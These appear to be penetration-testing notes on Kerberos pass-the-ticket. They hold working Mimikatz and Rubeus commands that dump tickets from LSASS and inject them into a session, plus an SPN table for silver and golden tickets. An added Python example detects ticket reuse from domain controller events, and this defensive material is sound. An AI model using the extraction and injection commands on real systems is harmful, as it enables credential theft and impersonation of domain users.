Pass The Ticket

Pass the ticket consists of using a Kerberos TGT or TGS ticket to perform authentication. The tickets are extracted from the LSASS process. Administrator privileges are required to extract other users' tickets; otherwise only your own can be extracted.

Ticket Extraction (Mimikatz)

.\mimikatz.exe 
> privilege::debug
> sekurlsa::tickets /export

Exported files are named [randomvalue]-username@service-domain.kirbi; a file whose service is krbtgt is a TGT.

Loading the ticket into the current session (as if it were a cookie)

> kerberos::ptt "<FILE.kirbi>"
> misc::cmd

Ticket Extraction (Rubeus)

Rubeus.exe dump /nowrap 
# printed in base64

Loading the ticket into the current session (as if it were a cookie)

Rubeus.exe ptt /ticket:<BASE64_TICKET>
Rubeus.exe ptt /ticket:<FILE.kirbi>  # obtained from mimikatz
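
Detection side of the steps above, as an added example that is not part of the original notes: a ticket taken from one host and loaded on another shows up at the domain controller as a service ticket request (event 4769) from an IP that never requested the TGT (event 4768) for that account. The record fields, host names and addresses below are constructed and simplified, and the 10-hour lifetime is the Active Directory default, assumed here.

```python
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # assumption: AD default user ticket lifetime

def norm_account(name):
    # 4769 records "user@REALM", 4768 records "user": compare on the bare name
    return name.split("@", 1)[0].lower()

def norm_ip(ip):
    # Domain controllers log IPv4 clients as "::ffff:a.b.c.d"
    return ip[7:] if ip.startswith("::ffff:") else ip

def find_ticket_reuse(events, lifetime=TGT_LIFETIME):
    """Flag 4769 requests from an IP that holds no live TGT for the account
    while another IP does (ticket issued to one host, used from another)."""
    issued = {}    # account -> {client IP: time of its latest 4768}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        acct, ip = norm_account(ev["account"]), norm_ip(ev["ip"])
        if ev["id"] == 4768:
            issued.setdefault(acct, {})[ip] = ev["time"]
        elif ev["id"] == 4769:
            live = sorted(src for src, t in issued.get(acct, {}).items()
                          if ev["time"] - t <= lifetime)
            # No live TGT on record at all: the log window may start too late, skip
            if live and ip not in live:
                findings.append({"account": acct, "used_from": ip,
                                 "tgt_issued_to": live, "service": ev["service"]})
    return findings

def mk(minutes, event_id, account, ip, service):
    # Builds one constructed sample record (simplified fields, not raw log output)
    return {"time": datetime(2024, 1, 15, 9, 0) + timedelta(minutes=minutes),
            "id": event_id, "account": account, "ip": ip, "service": service}

SAMPLE = [
    mk(0,   4768, "alice", "::ffff:10.0.0.21", "krbtgt"),
    mk(1,   4769, "alice@CORP.EXAMPLE", "::ffff:10.0.0.21", "FS01$"),  # same host: fine
    mk(30,  4769, "alice@CORP.EXAMPLE", "::ffff:10.0.0.66", "FS01$"),  # other host: flagged
    mk(35,  4769, "bob@CORP.EXAMPLE",   "::ffff:10.0.0.30", "DC01$"),  # no TGT seen: skipped
    mk(0,   4768, "carol", "::ffff:10.0.0.40", "krbtgt"),
    mk(660, 4769, "carol@CORP.EXAMPLE", "::ffff:10.0.0.41", "FS01$"),  # TGT expired: skipped
]

if __name__ == "__main__":
    for finding in find_ticket_reuse(SAMPLE):
        print(finding)
```

NAT, DHCP address changes, multi-homed hosts and delegation produce the same pattern, so treat a finding as a lead to correlate with host telemetry rather than a verdict.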

SPN service

Service Type | Service Silver Tickets
WMI | HOST, RPCSS
PowerShell Remoting | HOST, HTTP; depending on OS also: WSMAN, RPCSS
WinRM | HOST, HTTP; on some occasions you can just ask for: WINRM
Scheduled Tasks | HOST
Windows File Share, also psexec | CIFS
LDAP operations, including DCSync | LDAP
Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS
Golden Tickets | krbtgt
